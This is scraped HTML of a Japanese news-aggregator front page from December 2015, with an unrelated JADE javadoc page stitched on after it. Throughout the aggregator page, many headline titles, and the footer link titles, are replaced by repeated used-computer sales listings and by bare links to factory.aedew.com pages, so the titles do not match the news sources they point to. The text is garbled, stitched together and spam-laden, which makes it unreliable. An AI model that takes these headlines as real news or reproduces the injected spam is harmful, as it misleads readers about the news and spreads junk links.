(P44w)中古 ! 【中古】 ,中古 FUJITSUFMV-BIBLO LOOX T70H PentiumM 1.1GHz/PC-2700 768MB/HDD 80GB/DVDマルチドライブ/無線内蔵/WindowsXP Home Edition/OFFICE2013付き</a></div> </div> <span class='debug' style='display:none;'><!--score: 13.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">129<span>コメント</span></span> <span class="date date_new">9 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151225-00050134-yom-int" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="/url/headlines.yahoo.co.jp/hl?a=20151225-00050134-yom-int">ソウル日本大使館前の少女像、韓国が移転を検討 (読売新聞) - Yahoo!ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 13 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">86<span>コメント</span></span> <span class="date date_new">17 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151225-00000001-jct-soci" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410494e00bf.html">http://factory.aedew.com/images/Core2Duo/020410494e00bf.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 10 --></span> <div class="more"><a href="http://news.yahoo.co.jp/hl?c=bus">政治・経済 をもっと見る</a></div> </div> <a name="area_5"></a> <div class="item_list_box " id="area_5"> <div class="list_title"> <div class="controler"></div> <h2><a href="">IT・テクノロジー</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over20">24<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://pc.watch.impress.co.jp/docs/column/mobiler/20151226_737137.html" target="_blank" class="item_direct"> - pc.watch.impress.co.jp</a></div> <div class="item_title"><a href="">【モバイラーが憧れた名機を今風に蘇らせる】ソニー「バイオノート505エクストリーム」 ~最初にして最後の究極。これぞモバイラーのステータス - PC Watch</a></div> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/d4cd9a68ed5dd7ad42cacbc69a1cf4fe257d279e.jpg" width="160" height="120" onerror="this.parentNode.style.display='none'" style="left:-20px" /></a></div><p>HDDは東芝製の5mm厚の1.8インチタイプ。これもフレキケーブルで接続されている 天板および底面カバーだが、店頭モデルでは「<span>ニッケル強化カーボンモールド」、ソニースタイル専用の直販モデルでは「カーボンファイバー積層板」を採用するとされている。今回入手したのは店頭モデルで、前者を採用している。“ニッケル強化カーボンモ</span>...[<a href="http://pc.watch.impress.co.jp/docs/column/mobiler/20151226_737137.html" target="_blank">続きを読む</a>]</p> </div> </div><span class='debug' style='display:none;'><!--score: 4 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">15<span>コメント</span></span> <span class="date date_new">1 時間前  </span> <a href="http://akiba-pc.watch.impress.co.jp/docs/news/news/20151226_737187.html" target="_blank" class="item_direct"> - akiba-pc.watch.impress.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020411488n29jc.html">http://factory.aedew.com/images/Core2Duo/020411488n29jc.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">97<span>コメント</span></span> <span class="date date_new">22 時間前  </span> <a href="http://www.itmedia.co.jp/news/articles/1512/25/news108.html" target="_blank" class="item_direct"> - www.itmedia.co.jp</a></div> <div class="item_title"><a href="">中古一体型パソコン FUJITSU DESKPOWER FMV LX50S CeleronM 1.60GHz/PC2-5300 2GB/無線LAN内蔵/HDD 250GB/DVDマルチドライブ/Windows7 Home Premium SP1導入/リカバリCD?OFFICE2013付き</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">88<span>コメント</span></span> <span class="date date_new">20 時間前  </span> <a href="http://www.itmedia.co.jp/news/articles/1512/25/news130.html" target="_blank" class="item_direct"> - www.itmedia.co.jp</a></div> <div class="item_title"><a href="http://ceron.jp/url/www.itmedia.co.jp/news/articles/1512/25/news130.html">4文字しか使えないコミュニケーションアプリ「Ping」 - ITmedia ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 2.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">13<span>コメント</span></span> <span class="date date_new">13 時間前  </span> <a href="http://akiba-pc.watch.impress.co.jp/docs/wakiba/find/20151225_737149.html" target="_blank" class="item_direct"> - akiba-pc.watch.impress.co.jp</a></div> <div class="item_title"><a href="">中古 中古ノートパソコン DELL LATITUDE D610 PentiumM 2.13GHz/PC2-4200 1GB/HDD 40GB/DVDマルチドライブ/WindowsXP Pro SP3導入,中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 </a></div> </div> <span class='debug' style='display:none;'><!--score: 1 --></span> <div class="more"><a href="">IT・テクノロジー をもっと見る</a></div> </div> <a name="area_7"></a> <div class="item_list_box " id="area_7"> <div class="list_title"> <div class="controler"></div> <h2><a href="">科学・学問</a></h2> </div> <div class="item"> <div class="item_status"> <span class="link_num over20">22<span>コメント</span></span> <span class="date date_new">3 時間前  </span> <a href="http://nlab.itmedia.co.jp/nl/articles/1512/26/news025.html" target="_blank" class="item_direct"> - nlab.itmedia.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410599g17ed.html">http://factory.aedew.com/images/Core2Duo/020410599g17ed.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">15<span>コメント</span></span> <span class="date date_new">13 時間前  </span> <a href="http://www.asahi.com/articles/ASHDT7KWMHDTPTIL02V.html" target="_blank" class="item_direct"> - www.asahi.com</a></div> <div class="item_title"><a href="">阪大院教授らの研究費不正経理、2.7億円 大学が発表:朝日新聞デジタル</a></div> </div> <span class='debug' style='display:none;'><!--score: 1 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">14<span>コメント</span></span> <span class="date date_new">14 時間前  </span> <a href="http://karapaia.livedoor.biz/archives/52207962.html" target="_blank" class="item_direct"> - karapaia.livedoor.biz</a></div> <div class="item_title"><a href="">中古 中古ノートパソコン PANASONIC Let's NOTE CF-W2FW6AXR/PentiumM 1.2GHz/PC-2100 256MB/HDD 40GB/DVDマルチドライブ/無線LAN内蔵/WindowsXP Pro導入済み/OFFICE2013付き!</a></div> </div> <span class='debug' style='display:none;'><!--score: 1 --></span> <div class="more"><a href="">科学・学問 をもっと見る</a></div> </div> <a name="area_9"></a> <div class="item_list_box " id="area_9"> <div class="list_title"> <div class="controler"></div> <h2><a href="">2chまとめ</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over20">27<span>コメント</span></span> <span class="date date_new">7 時間前  </span> <a href="http://alfalfalfa.com/articles/140445.html" target="_blank" class="item_direct"> - alfalfalfa.com</a></div> <div class="item_title"><a href="">書店「Amazonばっかで本買うのやめてや!!」←これ | 2ちゃんねるスレッドまとめブログ - アルファルファモザイク</a></div> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/3b61c537fc58f529bf419a5c974cab5d82588790.jpg" width="213" height="120" onerror="this.parentNode.style.display='none'" style="left:-46px" /></a></div><p>14:風吹けば名無し@\(^o^)/2015/12/25(金) 10:07:08.94ID:28CoKVMbaXMAS.net焼<span>肉屋の名前みたい34:風吹けば名無し@\(^o^)/2015/12/25(金) 10:09:31.60ID:uAnL49f+0XMAS.net普通に本屋で買ってるぞ54:風吹けば名無し@\(^o^)/2015/12/25(金) 10</span>...[<a href="" target="_blank">続きを読む</a>]</p> </div> </div><span class='debug' style='display:none;'><!--score: 5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">18<span>コメント</span></span> <span class="date date_new">2 時間前  </span> <a href="http://blog.esuteru.com/archives/8449829.html" target="_blank" class="item_direct"> - blog.esuteru.com</a></div> <div class="item_title"><a href="">【は?】「『仏滅』『大安』などが書かれたカレンダーを回収します。差別につながるので」 ← 意味不明すぎて理解できないんだが : はちま起稿</a></div> </div> <span class='debug' style='display:none;'><!--score: 4.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">66<span>コメント</span></span> <span class="date date_new">14 時間前  </span> <a href="http://blog.livedoor.jp/dqnplus/archives/1864971.html" target="_blank" class="item_direct"> - blog.livedoor.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020411024z96kz.html">http://factory.aedew.com/images/Core2Duo/020411024z96kz.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 4.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">14<span>コメント</span></span> <span class="date date_new">2 時間前  </span> <a href="http://alfalfalfa.com/articles/140453.html" target="_blank" class="item_direct"> - alfalfalfa.com</a></div> <div class="item_title"><a href="">SEALDs「電車で携帯のゲームやるのは知能が低い」 | 2ちゃんねるスレッドまとめブログ - アルファルファモザイク</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">16<span>コメント</span></span> <span class="date date_new">5 時間前  </span> <a href="http://blog.esuteru.com/archives/8449718.html" target="_blank" class="item_direct"> - blog.esuteru.com</a></div> <div class="item_title"><a href="">中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 ,中古 中古ノートパソコン DELL Inspiron 1501 AMD Athlon64 X 2 TK-55 1.80GHz/PC2-5300 2GB/HDD 80GB/DVDコンボドライブ/無線LAN内蔵/Windows7 Home Premium 導入/リカバリCD?OFFICE2013付き</a></div> </div> <span class='debug' style='display:none;'><!--score: 2 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">14<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://blog.livedoor.jp/kinisoku/archives/4554064.html" target="_blank" class="item_direct"> - blog.livedoor.jp</a></div> <div class="item_title"><a href="">【画像】おい!クリスマスだしこの娘と野球拳しないかい:キニ速</a></div> </div> <span class='debug' style='display:none;'><!--score: 2 --></span> <div class="more"><a href="">2chまとめ をもっと見る</a></div> </div> <a name="area_10"></a> <div class="item_list_box " id="area_10"> <div class="list_title"> <div class="controler"></div> <h2><a href="">ネタ・話題・トピック</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over20">90<span>コメント</span></span> <span class="date date_new">15 時間前  </span> <a href="http://togetter.com/li/917078" target="_blank" class="item_direct"> - togetter.com</a></div> <div class="item_title"><a href="">【速報】クリスマスに新たな山下達郎伝説が生まれた!? 「Gの音が出ない」と開始90分後にライブを中止 - Togetterまとめ</a></div> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/9ff1006fb7b6091ba48b957edf5a63cce85e1079.jpg" width="120" height="159" onerror="this.parentNode.style.display='none'" style="left:0px" /></a></div><p>山下達郎盛岡コンサート、90分やったところでまさかの中止。 本人が喉の調子に納得出来ないとのこと。 来年に無料で再演しにくるとの<span>ことで、伝説に立ち合えたのはラッキーだが、クリスマスイブ聞けなかった。</span>...[<a href="" target="_blank">続きを読む</a>]</p> </div> </div><span class='debug' style='display:none;'><!--score: 6.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">21<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://nlab.itmedia.co.jp/nl/articles/1512/26/news015.html" target="_blank" class="item_direct"> - nlab.itmedia.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410443p03en.html">http://factory.aedew.com/images/Core2Duo/020410443p03en.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 4 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">15<span>コメント</span></span> <span class="date date_new">3 時間前  </span> <a href="http://togetter.com/li/917238" target="_blank" class="item_direct"> - togetter.com</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410477g21ki.html">http://factory.aedew.com/images/Core2Duo/020410477g21ki.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">80<span>コメント</span></span> <span class="date">2015-12-25 12:31</span> <a href="http://togetter.com/li/916919" target="_blank" class="item_direct"> - togetter.com</a></div> <div class="item_title"><a href="">中古 Webカメラ付き 中古ノートパソコン SONY VAIO VPCEB18FJ Core i5 430M 2.26GHz/PC3-8500 4GB/HDD 500GB/ブルーレイディスクドライブ/無線LAN?Bluetooth内蔵/Windows7 Home Premium SP1 32ビット/リカバリCD?OFFICE2013付き</a></div> </div> <span class='debug' style='display:none;'><!--score: 2.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">62<span>コメント</span></span> <span class="date">2015-12-25 08:36</span> <a href="http://d.hatena.ne.jp/ikkou2otosata0/touch/20151225/1450992232" target="_blank" class="item_direct"> - d.hatena.ne.jp</a></div> <div class="item_title"><a href="">オッケー、キリスト。ところで、あたしの誕生日の話も聞いとく? - 私の時代は終わった。</a></div> </div> <span class='debug' style='display:none;'><!--score: 2 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">17<span>コメント</span></span> <span class="date date_new">12 時間前  </span> <a href="http://togetter.com/li/917157" target="_blank" class="item_direct"> - togetter.com</a></div> <div class="item_title"><a href="">中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 ,中古パソコン 中古ノートパソコン DELL Vostro 1510 Celeron 550 2.0GHz/PC2-5300 2GB/HDD 80GB/無線内蔵/DVDマルチドライブ/Windows7 Home Premium 導入/リカバリCD?OFFICE2013付き中古</a></div> </div> <span class='debug' style='display:none;'><!--score: 1.5 --></span> <div class="more"><a href="">ネタ・話題・トピック をもっと見る</a></div> </div> <script type="text/javascript"> //現在のセッティングを読み込み var setting = "ct:news:5;ct:society:5;ct:entertainment:5;ct:sports:5;ct:itnews:5;ct:international:3;ct:science:3;ct:odekake:3;ct:2ch:6;ct:neta:6;"; var setting_list = new Array(); setting_split = setting.split(";"); for (var i = 0; i < setting_split.length; i++) { if(!setting_split[i]){continue}; if(m = setting_split[i].match(/^([a-z]*):(.*):(d*)$/)){ setting_list[i+1] = new Array(m[1],m[2],m[3]); }else{ setting_list[i+1] = new Array(); } } controler_set(); </script> <!-- 以下カスタム用HTML --> <div id="edit_area_module" style="display:none;"> <div id="edit_area_AREAID" style="display:none;margin-bottom: 1em;"> <div class="list_title" style="text-align:right;font-size:85%;font-weight:100;"> <a href="javascript:void(0);" onclick="area_change_cancel(AREAID)">キャンセル</a> <div class="controler" style="display:none;"></div> </div> <div id="edit_area_inner_AREAID" style="border:8px solid #ccc;padding:3em 15%;font-size:90%;"> <h3>AREAID 番目のエリア</h3> <p>このエリアに表示するニュースを設定します。</p> <div id="edit_area_1_AREAID"> <select id="select_1_AREAID" onchange="edit_area_2(AREAID)" style="margin-top:1em;"> <option value="">▼表示内容を選んでください▼</option> <option value="ct">カテゴリから選ぶ</option> <option value="kw">任意のキーワードを指定する</option> </select> </div> <br /> <div id="edit_area_2ct_AREAID" style="display:none;"> <select id="select_2ct_AREAID"> <option value="">▼カテゴリを選んでください▼</option> <option value="all">すべての記事</option> <option value="news">ニュース総合</option> <option value="society">政治・経済</option> <option value="international">海外ニュース</option> <option value="entertainment">エンタメ</option> <option value="sports">スポーツ</option> <option value="itnews">IT・テクノロジー</option> <option value="science">科学・学問</option> <option value="odekake">おでかけ・イベント</option> <option value="2ch">2chまとめ</option> <option value="neta">ネタ・話題・トピック</option> <option value="movie">動画</option> <option value="other">その他のニュース</option> </select> </div> <div id="edit_area_2kw_AREAID" style="display:none;"> キーワードを入力してください。<input id="select_2kw_AREAID" type="text" value="KEYWORD" size="32" /><br /> <div style="font-size:85%;color:#666;background:#eee;padding:0.5em;margin:0.5em 0;"> 入力したキーワードにヒットするニュースが配信されます。<br /> <b>複数指定</b>「AAA BBB」:スペースで区切るとAAAかつBBBにマッチする記事を配信します。<br /> <b>OR指定</b>「AAA OR BBB」:AAAまたはBBBにマッチする記事を配信します。ORはパイプ(|)も可。<br /> <b>特定のサイトを指定</b>「site:[URL]」:特定のURLにマッチする記事を配信します。<br /> <b>除外指定</b>「-XXX」:マイナスを付けると「XXX」にマッチする記事を除外します。 </div> </div> <div id="edit_area_3num_AREAID" style="display:none;"> 表示する数:<select id="select_3num_AREAID">NUMLIST</select> </div> <br /> <div style="line-height:2.5;"> <input type="button" value=" 決定 " onclick="area_change_save(AREAID)" style="font-size:150%;"/><br /> <input type="button" value="キャンセル" onclick="area_change_cancel(AREAID)" /> <input type="button" value="このエリアを削除" onclick="area_delete(AREAID)" /> <input type="button" value="この下にエリアを追加" onclick="area_add(AREAID)" /> <br /> <input type="button" value="1つ上へ移動" onclick="area_move(AREAID,-1)" /> <input type="button" value="1つ下へ移動" onclick="area_move(AREAID,1)" /> </div> </div> </div> </div> <!-- カスタム用HTMLここまで --> <div id="top_guidance"> </div><div class='pagenavi'><a href=''>全カテゴリ横断</a> <a href=''>昨日のランキング</a> </div><script type="text/javascript">footerbox_ad();</script></div> </div> <div id="side_column"> <div id="side_column_inner"> <div id="sidefollow"> <script type="text/javascript">sidebox_ad1()</script> <div id="side_flash" style="margin-bottom:4px;"> <div class="list_title"><h2><a href="">速報</a></h2></div> <div class="item_list_box"><div class="item"> <div class="item_status"> <span class="link_num over20">21<span>コメント</span></span> <span class="date date_new">42 分前   </span> <a href="http://news.line.me/list/886887b5/63a4858e236b" target="_blank" class="item_direct"> - news.line.me</a></div> <div class="item_title"><a href="">2016年新ヒーロー戦隊は「動物戦隊ジュウオウジャー」 - LINE NEWS</a></div> </div> <div class="item"> <div class="item_status"> <span class="link_num over3">11<span>コメント</span></span> <span class="date date_new">42 分前   </span> <a href="http://news.line.me/list/886887b5/eee8981f1889" target="_blank" class="item_direct"> - news.line.me</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410597i52hw.html">http://factory.aedew.com/images/Core2Duo/020410597i52hw.html</a></div> </div> <div id="side_imgs" style="margin-bottom:4px;"> <div class="list_title"><h2><a href="">画像で見る主要ニュース</a></h2></div> <div class="item_list_box"><div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/db592e52fb3695e73bb88902c6c90a5b239cd30b.jpg" width="120" height="120" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:0px" /></a></div> <div class="item_status"> <span class="link_num over500">506<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00050002-yom-soci" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="">大安・仏滅…記載は不適切、県がカレンダー回収 (読売新聞) - Yahoo!ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 67 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/770aec9bed626d0714c63dd827bad4f4c20876b2.jpg" width="120" height="172" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:0px" /></a></div> <div class="item_status"> <span class="link_num over100">387<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00000062-san-sctch" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020411018n69rd.html">http://factory.aedew.com/images/Core2Duo/020411018n69rd.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 28 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/f2a5b22bc8e16c4289aaf7767c8ef71cce9c4104.jpg" width="120" height="129" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:0px" /></a></div> <div class="item_status"> <span class="link_num over100">134<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00000004-nksports-socc" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="">柿谷曜一朗C大阪復帰 違約金大幅減少で完全移籍へ (日刊スポーツ) - Yahoo!ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 26 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/3d712f4a9f0d5a17af803c20b36a4d9d8bec0ea2.jpg" width="120" height="170" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:0px" /></a></div> <div class="item_status"> <span class="link_num over100">145<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://www.sankei.com/politics/news/151226/plt1512260001-n1.html" target="_blank" class="item_direct"> - www.sankei.com</a></div> <div class="item_title"><a href="">中古パソコン Webカメラ付き? 中古一体型パソコン SONY VGC-LA70B Core Duo T2300 1.66GHz/PC2-4200 2GB/HDD 200GB/DVDマルチドライブ/無線LAN内蔵/WindowsVista導入/OFFICE2013付き 中古,中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 </a></div> </div> <span class='debug' style='display:none;'><!--score: 26 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/3df371797c2edb03a03491018247c6d1d6d51e42.jpg" width="160" height="120" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:-20px" /></a></div> <div class="item_status"> <span class="link_num over20">62<span>コメント</span></span> <span class="date date_new">2 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00010000-chibatopi-l12" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410507z31dv.html">http://factory.aedew.com/images/Core2Duo/020410507z31dv.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 12 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/5f191d984c12ff6d166bf0cb65f99c56fedea305.jpg" width="180" height="120" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:-30px" /></a></div> <div class="item_status"> <span class="link_num over20">50<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://news.nicovideo.jp/watch/nw1961232" target="_blank" class="item_direct"> - news.nicovideo.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020411405s18hi.html">http://factory.aedew.com/images/Core2Duo/020411405s18hi.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 11 --></span> <div class="more"><a href="">もっと画像で見る</a></div></div> </div> </div> </div> </div> </div><!-- end field_inner --> </div><!-- end field--> <div id="footer_menu_bar" class="menu_bar"> <div id="footer_menu_bar_inner" class="menu_bar_inner"><ul><li><a href="/" class="selected">トップ</a></li><li><a href="/all/newitem/">速報</a></li><li><a href="/news/">ニュース総合</a></li><li><a href="/society/">政治経済</a></li><li><a href="/entertainment/">エンタメ</a></li><li><a href="/sports/">スポーツ</a></li><li><a href="/itnews/">IT</a></li><li><a href="/international/">海外</a></li><li><a href="/science/">科学</a></li><li><a href="/odekake/">おでかけ</a></li><li><a href="/movie/">動画</a></li><li><a href="/2ch/">2ch</a></li><li><a href="/neta/">ネタ</a></li><li><a href="/all/">すべて</a></li></ul></div> </div><!-- /menu_bar --> <div id="footer"> <div id="footer_inner"> <a href="" title="中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 "><img src="/img/logo_s.png" width="64px" height="32px" /></a>  <span class="icon_set"> <a href="" title="RSS" class="icon icon_rss"></a> <a href="http://www.twitter.com/" target="_blank" title="twitter中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 " class="icon icon_twitter"></a> <a href="https://www.facebook.com/" target="_blank" title="facebook中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 " class="icon icon_facebook"></a> </span> <br /> <a href="">このサイトについて</a> - <a href="">ご意見・お問い合わせ</a> - <a href="">中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 </a> <br /><br /> <div class="footer_copyright"> <a href="">天気アプリ</a> | <a href="">中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 </a> | <a href="">画像検索</a> | <a href="">Android音楽プレイヤー</a> | <a href="">メモ帳アプリ</a> </div> </div><!-- end footer_inner--> </div><!-- end footer--> </div><!-- end main--> </body> </html>
doc/api/jade/content/schema/class-use/VariableSchema.html
LeeboyOver9000/TCC
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="it"> <head> <!-- Generated by javadoc (version 1.7.0_03) on Tue Dec 09 10:56:13 CET 2014 --> <title>Uses of Class jade.content.schema.VariableSchema (JADE v4.3.3 API)</title> <meta name="date" content="2014-12-09"> <link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class jade.content.schema.VariableSchema (JADE v4.3.3 API)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../jade/content/schema/VariableSchema.html" title="class in jade.content.schema">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../index.html?jade/content/schema/\class-useVariableSchema.html" target="_top">Frames</a></li> <li><a href="VariableSchema.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h2 title="Uses of Class jade.content.schema.VariableSchema" class="title">Uses of Class<br>jade.content.schema.VariableSchema</h2> </div> <div class="classUseContainer">No usage of jade.content.schema.VariableSchema</div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../jade/content/schema/VariableSchema.html" title="class in jade.content.schema">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../index.html?jade/content/schema/\class-useVariableSchema.html" target="_top">Frames</a></li> <li><a href="VariableSchema.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small><center>These are the official <i><a href=http://jade.tilab.com target=top>JADE</a></i> API. For these API backward compatibility is guaranteed accross JADE versions</center></small></p> </body> </html>
